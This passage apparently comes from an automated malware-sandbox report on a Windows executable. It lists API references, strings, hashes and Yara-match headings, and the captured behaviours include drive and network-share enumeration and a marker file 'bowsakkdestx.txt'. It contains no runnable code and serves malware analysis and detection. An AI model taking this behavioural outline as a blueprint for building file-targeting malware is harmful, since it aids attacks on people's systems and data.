                                                                                      • Opcode Fuzzy Hash: 4aab24fa332338ded8e28756c8d48da1e1a79256754183a9b5f45fe68276ae34
                                                                                      • Instruction Fuzzy Hash: FA5156317002489FE721DE29CC41AAF7BA5EF55314F1885AFFA448B282D739DC25CB65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: MessageTimetime$Peek$DispatchSleep
                                                                                      • String ID:
                                                                                      • API String ID: 3697694649-0
                                                                                      • Opcode ID: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                      • Instruction ID: 47d0c5dc5d1eae46eaa001befe89e32fbe66e83151f6641dec248f991c3ab793
                                                                                      • Opcode Fuzzy Hash: fcc8413cfddb585fd402253dfe517567f0959867a63999003a9cc793a607e07b
                                                                                      • Instruction Fuzzy Hash: EE017532A40319A6DB2097E59C81FEEB768AB44B40F044066FB04A71D0E664A9418BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • ___from_strstr_to_strchr.LIBCMT ref: 004507C3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ___from_strstr_to_strchr
                                                                                      • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                      • API String ID: 601868998-2416195885
                                                                                      • Opcode ID: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                      • Instruction ID: 4fd155d7ac4cfc4ad9107eba643b63d3b81161049ee91e28a54c83c9030a6459
                                                                                      • Opcode Fuzzy Hash: 46bb62eb4ffcb3ef403e86853a7eb45dbe6c4dfbd3a8551aa62d907c1259c874
                                                                                      • Instruction Fuzzy Hash: F64109756043055BDB20EE25CC45BAFB7D8EF85309F40082FF98593242E679E90C8B96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: .\crypto\buffer\buffer.c$g9F
                                                                                      • API String ID: 2102423945-3653307630
                                                                                      • Opcode ID: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                      • Instruction ID: 958ac6a2dbe7618ecd56aaf11cdfe4c63fb5daf7b6a990d4d23814bb8d8bf6ac
                                                                                      • Opcode Fuzzy Hash: 41b8760603798dafaf4d4572c250bcd82449d7f0d7c455ebd7b4e1b6c976a6df
                                                                                      • Instruction Fuzzy Hash: 27212BB6B403213FE210665DFC43B66B399EB84B15F10413BF618D73C2D6A8A865C3D9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _wcsnlen
                                                                                      • String ID: U
                                                                                      • API String ID: 3628947076-3372436214
                                                                                      • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                      • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                                                                                      • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                                                                                      • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _fprintf_memset
                                                                                      • String ID: .\crypto\pem\pem_lib.c$Enter PEM pass phrase:$phrase is too short, needs to be at least %d chars
                                                                                      • API String ID: 3021507156-3399676524
                                                                                      • Opcode ID: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                      • Instruction ID: 90c6fe5d672865ace0ee8fbe81ed9b43ee89a432c17a94ace257beddb0b51c59
                                                                                      • Opcode Fuzzy Hash: ecf0358a9dba2a972d623e611d8bee7a2e74e734002f68b3a08fbe7946495174
                                                                                      • Instruction Fuzzy Hash: 0E218B72B043513BE720AD22AC01FBB7799CFC179DF04441AFA54672C6E639ED0942AA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C539
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 29327785-2616962270
                                                                                      • Opcode ID: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                      • Instruction ID: a05810460da3035b09b2d6f50620da2975429261b58b3288bff945a9ad0f9da5
                                                                                      • Opcode Fuzzy Hash: ba6770418a514e061c64693ffdbf2edbdfd545916963a0667ce2a0b7d493bc5b
                                                                                      • Instruction Fuzzy Hash: 281127B2B4023833D930756A7C87FEB735C9B42725F4001B7FE0CA2182A5AE554501E9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CreateWindowExW.USER32 ref: 0041BAAD
                                                                                      • ShowWindow.USER32(00000000,00000000), ref: 0041BABE
                                                                                      • UpdateWindow.USER32(00000000), ref: 0041BAC5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Window$CreateShowUpdate
                                                                                      • String ID: LPCWSTRszTitle$LPCWSTRszWindowClass
                                                                                      • API String ID: 2944774295-3503800400
                                                                                      • Opcode ID: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                      • Instruction ID: 93e3ae8c3ab6e4512016b3ef7200399996c0305a41779b72c5d02abe3f8cd5ff
                                                                                      • Opcode Fuzzy Hash: a65d1e0183acb99785454671d95aa34da9e61ee796a7d373e4ca79d97c1a5a0d
                                                                                      • Instruction Fuzzy Hash: 08E04F316C172077E3715B15BC5BFDA2918FB05F10F308119FA14792E0C6E569428A8C
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • WNetOpenEnumW.MPR(00000002,00000000,00000000,?,?), ref: 00410C12
                                                                                      • GlobalAlloc.KERNEL32(00000040,00004000,?,?), ref: 00410C39
                                                                                      • _memset.LIBCMT ref: 00410C4C
                                                                                      • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Enum$AllocGlobalOpenResource_memset
                                                                                      • String ID:
                                                                                      • API String ID: 364255426-0
                                                                                      • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                      • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                                                                                      • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                                                                                      • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • GetLogicalDrives.KERNEL32 ref: 00410A75
                                                                                      • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                                                                                      • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                                                                                      • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                                                                                      • String ID:
                                                                                      • API String ID: 2560635915-0
                                                                                      • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                      • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                                                                                      • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                                                                                      • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 0043B70B
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • _free.LIBCMT ref: 0043B71E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap_free_malloc
                                                                                      • String ID:
                                                                                      • API String ID: 1020059152-0
                                                                                      • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                      • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                                                                                      • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                                                                                      • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                      • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                                                                                      • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                                                                                      • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                      • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                                                                                      • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                                                                                      • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32 ref: 0041FA53
                                                                                      • PeekMessageW.USER32 ref: 0041FA71
                                                                                      • DispatchMessageW.USER32 ref: 0041FA7B
                                                                                      • PeekMessageW.USER32 ref: 0041FA89
                                                                                      • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                      • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                                                                                      • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                      • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • PostThreadMessageW.USER32 ref: 0041FE03
                                                                                      • PeekMessageW.USER32 ref: 0041FE21
                                                                                      • DispatchMessageW.USER32 ref: 0041FE2B
                                                                                      • PeekMessageW.USER32 ref: 0041FE39
                                                                                      • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                      • String ID:
                                                                                      • API String ID: 1380987712-0
                                                                                      • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                      • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                                                                                      • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                                                                                      • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                      • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                      • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                      • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memmove
                                                                                      • String ID: invalid string position$string too long
                                                                                      • API String ID: 4104443479-4289949731
                                                                                      • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                      • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                      • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                      • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _memset
                                                                                      • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                      • API String ID: 2102423945-2013712220
                                                                                      • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                      • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                      • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                      • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: StringUuid$CreateFree
                                                                                      • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                      • API String ID: 3044360575-2335240114
                                                                                      • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                      • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                                                                                      • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                                                                                      • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: _wcscmp
                                                                                      • String ID: ACP$OCP
                                                                                      • API String ID: 856254489-711371036
                                                                                      • Opcode ID: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                      • Instruction ID: be6dee110b44ec76455643647cb0bd3c477e6d53c765760a4e3a4e904bc1756d
                                                                                      • Opcode Fuzzy Hash: aa8000f8b7855d8823c6aeee0a3666c2c2ac351801b90a308c615276b5b88e11
                                                                                      • Instruction Fuzzy Hash: EF01C4A2608215B6EB34BA59DC42FAE37899F0C3A4F105417F948D6281F77CEB4042DC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 29327785-2616962270
                                                                                      • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                      • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                                                                                      • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                                                                                      • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • _malloc.LIBCMT ref: 00423B64
                                                                                        • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                        • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                        • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005E0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                      • std::exception::exception.LIBCMT ref: 00423B82
                                                                                      • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                        • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                      • String ID: bad allocation
                                                                                      • API String ID: 3074076210-2104205924
                                                                                      • Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                      • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                      • Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                      • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                      • RegisterClassExW.USER32 ref: 0041BA73
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000002.310240469.0000000000529000.00000040.00000001.sdmp
                                                                                      • Associated: 00000005.00000002.310246559.000000000052B000.00000040.00000001.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: ClassCursorLoadRegister
                                                                                      • String ID: 0$LPCWSTRszWindowClass
                                                                                      • API String ID: 1693014935-1496217519
                                                                                      • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                      • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                                                                                      • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                                                                                      • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                                                                                      • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                                                                                      • DeleteFileA.KERNEL32(?), ref: 0040C45B
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000005.00000001.301512197.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000005.00000001.302515872.0000000000529000.00000040.00020000.sdmp
                                                                                      • Associated: 00000005.00000001.302558580.000000000052B000.00000040.00020000.sdmp
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Path$AppendDeleteFileFolder
                                                                                      • String ID: bowsakkdestx.txt
                                                                                      • API String ID: 610490371-2616962270
                                                                                      • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                      • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                                                                                      • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                                                                                      • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

APIs
• __FF_MSGBANNER.LIBCMT ref: 00427C31
  • Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F78
  • Part of subcall function 00427F51: __NMSG_WRITE.LIBCMT ref: 00427F82
• __NMSG_WRITE.LIBCMT ref: 00427C39
  • Part of subcall function 00427FAE: GetModuleFileNameW.KERNEL32(00000000,005104BA,00000104,?,00000001,i;B), ref: 00428040
